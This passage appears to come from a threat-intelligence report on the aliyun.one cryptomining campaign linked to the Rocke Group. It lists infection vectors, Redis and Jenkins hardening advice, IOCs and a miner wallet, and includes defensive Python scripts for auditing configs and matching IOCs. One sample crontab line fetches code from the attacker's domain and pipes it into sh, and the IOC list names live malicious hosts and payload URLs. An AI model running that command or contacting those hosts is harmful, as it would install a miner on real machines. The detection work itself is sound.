systemten.org was previously identified as the kerberods mining malware. Comparing the infection methods and persistence techniques of kerberods with those seen here, we can confirm that the aliyun.one campaign and the kerberods mining family are run by the same operators. This group was earlier disclosed by Unit42 as the Rocke Group.
0x3 Infection vectors
1. SSH weak-password brute force
2. SSH passwordless (key-based) login between already-compromised hosts
3. Redis unauthenticated access
4. Redis weak-password brute force
5. Jenkins weak-password brute force
6. Jenkins remote code execution (CVE-2018-1000861, CVE-2019-1003000)
7. ActiveMQ arbitrary file write (CVE-2016-3088)
0x4 Mitigation
1. Change passwords to strong ones, with a different password on every machine.
2. Strictly restrict which machines are allowed SSH passwordless (key-based) login.
3. Harden Redis: enable Redis password authentication and set the password to a strong one.
4. Check Jenkins for weak passwords and change them to strong passwords.
5. Check for the Jenkins remote code execution vulnerabilities and patch them.
6. Check for the ActiveMQ arbitrary file write vulnerability.
7. Check for the Confluence unauthenticated access vulnerability (CVE-2019-3396).
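The Redis items in the mitigation list (disable unauthenticated access, require a strong password) can be checked mechanically against a redis.conf. The following is an added example written for this page, not code from the report or from the Redis project; the two configurations are constructed samples, and the 16-character minimum password length is an assumption chosen for illustration.

```python
"""Audit a redis.conf for the weak settings the mitigation list targets."""

MIN_PASSWORD_LEN = 16  # assumption: anything shorter is treated as weak

# Constructed sample configurations (not taken from the report).
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_A_LONG_RANDOM_SECRET_x9Qm
rename-command CONFIG ""
"""


def parse_redis_conf(text):
    """Return {directive: [args, ...]} for active lines; comments and blanks are skipped.

    Each directive maps to a list of argument lists, so a directive given more
    than once keeps every occurrence (Redis applies the last one).
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return a list of (code, message) findings; an empty list means no weak setting found."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. Exposure: no bind, or bind on a wildcard address, listens on every interface.
    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append(("bind-any",
                         "Redis listens on all interfaces; bind to 127.0.0.1 or an internal address"))

    # 2. protected-mode is the built-in guard against unauthenticated remote access.
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append(("protected-mode-off", "protected-mode is disabled"))

    # 3. Authentication: requirepass must be present, non-empty and long enough.
    pw = conf.get("requirepass")
    if not pw or not pw[-1]:
        findings.append(("no-requirepass",
                         "no password configured: unauthenticated access is possible"))
    elif len(pw[-1][0]) < MIN_PASSWORD_LEN:
        findings.append(("weak-requirepass",
                         "password shorter than %d characters" % MIN_PASSWORD_LEN))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or "OK")
```

The hardened sample also renames the CONFIG command away, which is a standard Redis directive; the audit does not require it, since the report's list only asks for password authentication.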
0x5 IOC
F81137FF4ED563101B3ACB8185CF16D5AF89C9E5
52AA4166F256495250C9191670DB258794059277
update.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
x64.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
cron.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
aliyun.one
pool.supportxmr.com
sg.minexmr.com
iap5u1rbety6vifaxsi9vovnc9jjay2l.com
img.sobot.com/chatres/89/msg/20191225/1/ec0991da601e45c4b0bb6178da5f0cc4.png
img.sobot.com/chatres/89/msg/20191225/1/50659157a100466a88fed550423a38ee.png
cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269944760/2.637890910155951.png
cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269966297/8.872362655092918.png
https://user-images.githubusercontent.com/56861392/71443284-08acf200-2745-11ea-8ef3-509d9072d970.png
https://user-images.githubusercontent.com/56861392/71443285-08acf200-2745-11ea-96c3-0c2be9135085.png
0x6 Wallet address
48tKyhLzJvmfpaZjeEh2rmWSxbFqg7jNzPvQbLgueAc6avfKVrJFnyAMBuTn9ZeG4A3Gfww512YNZB9Tvaf52aVbPHpJFXT
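The hashes, domains and wallet above are most useful when they are checked against what is actually on a host: crontabs, DNS logs, miner configuration files, and binaries on disk. The following is an added example, not part of the report, that matches those IOCs against text lines and file contents. The four sample lines are constructed for the demonstration (the URL path is a placeholder), and systemten.org is included because the report names it as the earlier campaign.

```python
"""Match the report's IOCs against text lines (logs, crontabs, configs) and file bytes."""
import hashlib
import re

# IOCs taken from the report (hashes lowercased for comparison).
IOC_SHA1 = {
    "f81137ff4ed563101b3acb8185cf16d5af89c9e5",
    "52aa4166f256495250c9191670db258794059277",
}
IOC_DOMAINS = {
    "iap5u1rbety6vifaxsi9vovnc9jjay2l.com",  # also covers update./x64./cron. subdomains
    "aliyun.one",
    "systemten.org",
    "pool.supportxmr.com",
    "sg.minexmr.com",
}
IOC_WALLET = ("48tKyhLzJvmfpaZjeEh2rmWSxbFqg7jNzPvQbLgueAc6avfKVrJFnyAMBuTn9ZeG4A3Gfww"
              "512YNZB9Tvaf52aVbPHpJFXT")

# Candidate hostnames: dotted labels ending in an alphabetic TLD.
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)

# Constructed sample lines (not from the report): a DNS resolver log entry,
# a crontab entry, a miner config fragment, and a benign sshd line.
SAMPLE_LINES = [
    "Dec 26 03:14:07 web01 unbound[412]: info: query x64.iap5u1rbety6vifaxsi9vovnc9jjay2l.com. A IN",
    "*/10 * * * * curl -fsSL http://cron.iap5u1rbety6vifaxsi9vovnc9jjay2l.com/PLACEHOLDER_PATH | sh",
    '"url": "pool.supportxmr.com:3333", "user": "' + IOC_WALLET + '"',
    "Dec 26 03:14:09 web01 sshd[901]: Accepted publickey for deploy from 10.0.0.7 port 51022",
]


def scan_line(line):
    """Return a sorted list of IOC tags found in one line of text."""
    hits = set()
    for host in HOST_RE.findall(line):
        h = host.lower().rstrip(".")
        for d in IOC_DOMAINS:
            # Exact match or any subdomain of a listed domain.
            if h == d or h.endswith("." + d):
                hits.add("domain:" + d)
    if IOC_WALLET in line:
        hits.add("wallet")
    return sorted(hits)


def scan_lines(lines):
    """Return [(line_number, tags)] for every line that carries at least one IOC."""
    results = []
    for number, line in enumerate(lines, 1):
        tags = scan_line(line)
        if tags:
            results.append((number, tags))
    return results


def file_hash_hit(data):
    """True if the SHA-1 of the given file contents is one of the report's hashes."""
    return hashlib.sha1(data).hexdigest() in IOC_SHA1


if __name__ == "__main__":
    for number, tags in scan_lines(SAMPLE_LINES):
        print("line %d: %s" % (number, ", ".join(tags)))
    print("clean bytes match:", file_hash_hit(b"constructed clean content"))
```

Feeding `/etc/crontab`, per-user crontabs, resolver logs and shell histories through `scan_lines`, and binaries in temp and home directories through `file_hash_hit`, covers the three artifact classes the IOC list describes; the mining pool domains and the wallet are the most durable of them, since the attacker's own domains rotate.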
0x7 References
https://v2ex.com/t/624351
https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-december-2019
https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/
https://unit42.paloaltonetworks.com/rockein-the-netflow/